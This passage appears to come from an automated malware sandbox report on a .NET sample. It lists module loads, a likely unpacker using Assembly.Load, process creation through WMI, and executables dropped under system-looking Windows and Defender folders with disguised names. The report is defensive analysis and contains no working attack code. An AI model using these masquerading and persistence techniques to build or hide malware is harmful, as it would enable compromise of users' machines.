                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Z4D3XAZ2jB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Z4D3XAZ2jB.exeStatic file information: File size 3163910 > 1048576
                    Source: Z4D3XAZ2jB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Z4D3XAZ2jB.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: services.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe0.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe1.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: ZDtOzYsYYWKWEhNYzFc.exe2.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B7600BD pushad ; iretd 0_2_00007FFD9B7600C1
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B9167EC pushad ; iretd 0_2_00007FFD9B9167ED
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B9B8AF4 push E8000000h; ret 0_2_00007FFD9B9B8AF9
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 0_2_00007FFD9B9B5CA1 push edi; iretd 0_2_00007FFD9B9B5CB6
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7AEE7E push ebp; iretd 16_2_00007FFD9B7AEE80
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7D9803 push eax; iretd 16_2_00007FFD9B7D980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7DC74C pushad ; retf 16_2_00007FFD9B7DC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7D7567 push ebx; iretd 16_2_00007FFD9B7D756A
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B7900BD pushad ; iretd 16_2_00007FFD9B7900C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B884644 push ds; retf 16_2_00007FFD9B884662
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B9467EC pushad ; iretd 16_2_00007FFD9B9467ED
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B9E5CB0 push edi; iretd 16_2_00007FFD9B9E5CB6
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9BFE7BA3 push ecx; ret 16_2_00007FFD9BFE7BAC
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7D9803 push eax; iretd 19_2_00007FFD9B7D980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7DC74C pushad ; retf 19_2_00007FFD9B7DC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7D7567 push ebx; iretd 19_2_00007FFD9B7D756A
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7900BD pushad ; iretd 19_2_00007FFD9B7900C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 19_2_00007FFD9B7AEE7E push ebp; iretd 19_2_00007FFD9B7AEE80
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B7B9803 push eax; iretd 20_2_00007FFD9B7B980D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B7BC74C pushad ; retf 20_2_00007FFD9B7BC74D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 20_2_00007FFD9B7700BD pushad ; iretd 20_2_00007FFD9B7700C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 22_2_00007FFD9B7700BD pushad ; iretd 22_2_00007FFD9B7700C1
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeCode function: 24_2_00007FFD9B7500BD pushad ; iretd 24_2_00007FFD9B7500C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 25_2_00007FFD9B7900BD pushad ; iretd 25_2_00007FFD9B7900C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B7B9803 push eax; iretd 28_2_00007FFD9B7B980D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B7BC74C pushad ; retf 28_2_00007FFD9B7BC74D
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 28_2_00007FFD9B7700BD pushad ; iretd 28_2_00007FFD9B7700C1
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B7B9803 push eax; iretd 31_2_00007FFD9B7B980D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B7BC74C pushad ; retf 31_2_00007FFD9B7BC74D
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 31_2_00007FFD9B7700BD pushad ; iretd 31_2_00007FFD9B7700C1
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 32_2_00007FFD9B7AEE7E push ebp; iretd 32_2_00007FFD9B7AEE80

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\services.exeJump to dropped file
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: unknownExecutable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: unknownExecutable created and started: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: unknownExecutable created and started: C:\Windows\GameBarPresenceWriter\services.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\NPGqEfku.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\RbOZahUq.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\tWJuefum.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\rAXMkKSS.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\SYphwgjk.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\uUlCzfJh.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\rMnteNPl.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\lyXnXruh.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\MgNITBew.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\WPgYDdje.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\HkLrMVoC.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\UAeHorhP.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\wySLBGmi.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\hdUdukKE.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\dVPxoyeA.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\ADqcsYvZ.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\quZEfXkb.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\MoHhbGed.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\CNYkWNAB.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\wNAllcuf.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\YALoKruW.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\HtvJqEPI.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\oPsvdwHZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\services.exeJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\hREwAhMk.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\OquQxqjY.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\eJTFZLay.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\CFoRreZv.logJump to dropped file
